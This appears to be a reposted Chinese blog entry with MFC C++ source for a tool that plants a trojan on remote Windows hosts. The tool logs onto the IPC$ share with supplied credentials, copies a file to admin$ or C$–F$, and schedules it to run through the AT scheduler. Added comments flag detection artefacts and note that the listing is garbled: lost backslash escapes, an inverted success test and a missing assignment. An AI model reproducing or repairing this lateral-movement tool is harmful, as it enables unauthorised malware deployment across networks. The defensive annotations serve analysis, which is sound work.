
远程IPC种植木马

时间:2017-08-15 19:52:19


实现代码如下（注：此为转载备份的原始代码，转载过程中字符串里的反斜杠转义已丢失，下文代码注释中有说明）：

///////////////////////////////////////////////////////////////////////////////////// 
/// Per-host argument block handed from the dialog (UI) thread to ThreadIpcConnect.
/// Every field is filled in by CShareDlg::OnStart before the worker thread starts;
/// the thread reads them and writes status lines back through `list`.
struct TagHost
{
  CString host;          // target host name/address; used to build \\host\ipc$ and \\host\<share>\...
  CString user;          // account name for the IPC$ logon (WNetAddConnection2 lpUserName)
  CString pass;          // password for that account (WNetAddConnection2 lpPassword)
  CString filename;      // name the copied file gets on the target share
  CString LocalFilePath; // local file that is copied to the target
  CListBox* list;        // dialog list box that receives status strings; not owned by this struct
};
typedef TagHost IPC;
/// Dialog "start" handler: snapshots the edit-control values into a freshly
/// allocated IPC block and starts one ThreadIpcConnect worker for that host.
void CShareDlg::OnStart() 
{ 
  // Pull the current control contents into the m_* members.
  UpdateData(TRUE); 

  IPC* args = new IPC; 
  args->list = &m_list;              // status output goes to the dialog's list box
  args->LocalFilePath = m_localfile; 
  args->filename = filename;         // `filename` is not a dialog member assigned here; presumably a class/global variable — confirm
  args->pass = m_pass; 
  args->user = m_user; 
  args->host = m_host; 

  // Ownership of `args` is handed to the worker thread.
  // NOTE(review): nothing ever deletes it — not here (e.g. when AfxBeginThread
  // returns NULL) and not in ThreadIpcConnect — so one IPC block leaks per start.
  AfxBeginThread(ThreadIpcConnect,args); 
}
/////////////////////////////线程/////////////////////////////////////////////////////
/// Worker thread for one target host. `lpvoid` is the IPC block allocated with `new`
/// in CShareDlg::OnStart; it is never deleted (neither there nor here).
///
/// Sequence:
///   1. WNetAddConnection2 to \\host\ipc$ with the supplied user name / password.
///   2. CopyFile the local file into the first writable administrative share
///      (admin$, then C$, D$, E$, F$), recording the matching local path in CmdCom.
///   3. NetRemoteTOD to read the target's clock, then NetScheduleJobAdd (the legacy
///      AT scheduler) to run CmdCom about one minute later.
/// Progress is reported by appending strings to the dialog's CListBox.
///
/// Analyst notes: the artefacts this leaves on the target are an SMB logon/session to
/// IPC$, a file written to an administrative share, and a remotely created AT job.
///
/// NOTE(review): this listing does not compile as pasted — the backslash escaping of
/// the UNC/path literals was lost in transcription (e.g. "\\%s\ipc$" and "admin$\"
/// would have been "\\\\%s\\ipc$" and "admin$\\"; as written, `\"` escapes the closing
/// quote). The code is left byte-for-byte as found; only comments were added.
UINT ThreadIpcConnect(LPVOID lpvoid) 
{ 
  IPC* ipc; 
  CListBox* list;
  ipc = (IPC*)lpvoid; 
  // Local copies of the argument block (ipc itself is never freed).
  CString host; 
  CString admin; 
  CString pass; 
  CString filename; 
  CString localfilepath;
  host = ipc->host ; 
  pass = ipc->pass; 
  admin = ipc->user; 
  localfilepath = ipc->LocalFilePath; 
  filename =ipc->filename ; 
// NOTE(review): `list` is the dialog's CListBox and is written from this worker thread
// (AddString below); MFC generally discourages touching CWnd objects off their owning
// thread — posting a message to the dialog would be the usual approach.
list = ipc->list; 
  BOOL IpcConnect;
  LPTIME_OF_DAY_INFO TimeBuf=NULL; 
  NET_API_STATUS Status;
  // CmdCom is the command line NetScheduleJobAdd will run on the target. It is only
  // overwritten on the C$..F$ fallbacks; on the admin$ path it keeps this prefix and
  // `filename` is never appended (contrast the C$ branch below) — most likely a
  // transcription loss, since "admin$\" is a share name rather than a local path.
  CString RemoteFilePath,CmdCom("admin$\"); 
/////////////////////////////// IPC$ connection //////////////////////////////////////////////////////// 
  NETRESOURCE ns; 
  TCHAR buf[MAX_PATH]; 
  // Intended result: \\host\ipc$ (literal escaping mangled here, see header note).
  // wsprintf is not bounds-aware: a host string close to MAX_PATH would overrun buf.
  wsprintf(buf,"\\%s\ipc$",host); 
  ZeroMemory(&ns,sizeof(ns)); 
  ns.dwScope=RESOURCE_GLOBALNET; 
  ns.dwType=RESOURCETYPE_ANY; 
  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC; 
  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE; 
  // Empty local name: connect without redirecting a local device (no drive letter).
  ns.lpLocalName=""; 
  ns.lpRemoteName=buf; 
  ns.lpProvider=NULL; 
  ns.lpComment=NULL; 
  CString hhost = host; 
  // Explicit credentials; WNetAddConnection2's parameter order is (resource, password, user, flags).
  // NOTE(review): WNetAddConnection2 returns NO_ERROR (0) on success and a Win32 error
  // code otherwise. Storing that in a BOOL and testing `if(IpcConnect)` below therefore
  // treats a *failed* connection as success and a successful one as "连接失败".
  // The session is also never released with WNetCancelConnection2.
  IpcConnect =WNetAddConnection2(&ns,pass,admin,0); 
/// Establish the IPC$ connection 
  if(IpcConnect) 
  { 
// "Connected" branch (see the note above on the sense of this test).
/////////////////////////// Upload the file to an administrative share ////////////////////////////////// 
    RemoteFilePath=("\\"+host+"\admin$\"+filename); 
    // bFailIfExists == FALSE: an existing file of the same name on the target is overwritten.
    // From here on IpcConnect holds CopyFile's BOOL result ("copied"), not the connection status.
    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
// Copy into admin$ (the Windows directory share). If that fails, fall back to the
// root shares C$..F$ in turn, keeping the corresponding local path in CmdCom.
      if(!IpcConnect) 
        { 
          RemoteFilePath=("\\"+host+"\C$\"+filename); 
          CmdCom="C:\"+filename; 
          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
            if(!IpcConnect) 
            { 
               RemoteFilePath=("\\"+host+"\D$\"+filename); 
               CmdCom="D:\"+filename; 
               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
           if(!IpcConnect) 
                  { 
                     RemoteFilePath=("\\"+host+"\E$\"+filename); 
                     CmdCom="E:\"+filename; 
                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
                     if(!IpcConnect) 
                       { 
                        // NOTE(review): the `=` is missing on the next line, so the F$ path
                        // is never assigned (and the statement is not valid C++ as written);
                        // the CopyFile below would simply retry the E$ path.
                        RemoteFilePath ("\\"+host+"\F$\"+filename); 
                        CmdCom = "F:\"+filename; 
                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE); 
                       } 
                  } 
              } 
         } 
/////////////////////////// Read the target's clock //////////////////////////////////////////////////// 
         if(IpcConnect) 
         {// Query the remote time of day so the job can be scheduled relative to it.
           // NOTE(review): AllocSysString() allocates a BSTR that is never freed (same for
           // the two calls further down), and TimeBuf is never released with NetApiBufferFree.
           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf); 
            if(Status==NERR_Success) 
            {// Remote time obtained.
/////////////////////////// Launch the uploaded file /////////////////////////////////////////////////// 
              DWORD day=1,JobTime; 
              AT_INFO ai; 
              day=day*2; 
              ai.Command=CmdCom.AllocSysString(); 
              // NOTE(review): AT_INFO.DaysOfMonth is a bitmask (bit 0 = the 1st of the month),
              // so the value 2 selects the 2nd of the month rather than "today", which does not
              // match the "one minute later" intent below — verify against the original source.
              ai.DaysOfMonth=day; 
              ai.DaysOfWeek=0; 
              ai.Flags=JOB_NONINTERACTIVE; 
              // Milliseconds since midnight in the target's local time: tod_hours is UTC and
              // tod_timezone is minutes west of UTC, so hours - tz/60 gives local hours; then
              // one minute is added. `% 24` is applied to the hours only, before the minutes
              // are added; if the intermediate hour is negative (west-of-UTC zone, early UTC
              // hours) `% 24` stays negative and JobTime wraps as a DWORD.
              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000; 
              // Remote AT job creation on hhost; on success JobTime receives the job id.
              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime); 
              // Run the uploaded file, scheduled one minute from now (per the original author's comment).
              if(Status==NERR_Success) 
              { 
                list->AddString(host+"启动成功"); 
              } 
              else 
                list->AddString(host+"启动失败"); 
              } 
          else 
            { 
             list->AddString(host+"获取时间失败"); 
            } 
         } 
         else 
         { 
          list->AddString(host+"拷贝文件失败"); 
         } 
    } 
    else 
    list->AddString(host+"连接失败"); 
// Thread exit code is TRUE regardless of outcome; the IPC block is leaked (never deleted).
return TRUE; 
}
 


代码来自互联网，在此仅作备份，供分析木马病毒时参考。需要注意：转载过程中字符串字面量里的反斜杠转义已丢失（例如 "\\%s\ipc$"、"admin$\"），代码按原样无法编译；另外 WNetAddConnection2 成功时返回 NO_ERROR(0)，而代码用 if(IpcConnect) 判断连接成功，条件是反的。本文的价值在于展示 IPC$ 连接 → 向管理共享（admin$/C$ 等）拷贝文件 → NetScheduleJobAdd（AT 计划任务）远程启动 这一经典横向移动手法，以及它在目标机上留下的可检测痕迹：IPC$ 登录会话、对管理共享的文件写入、远程创建的 AT 作业。

远程IPC种植木马


原文地址:http://www.cnblogs.com/yfceshi/p/7366937.html
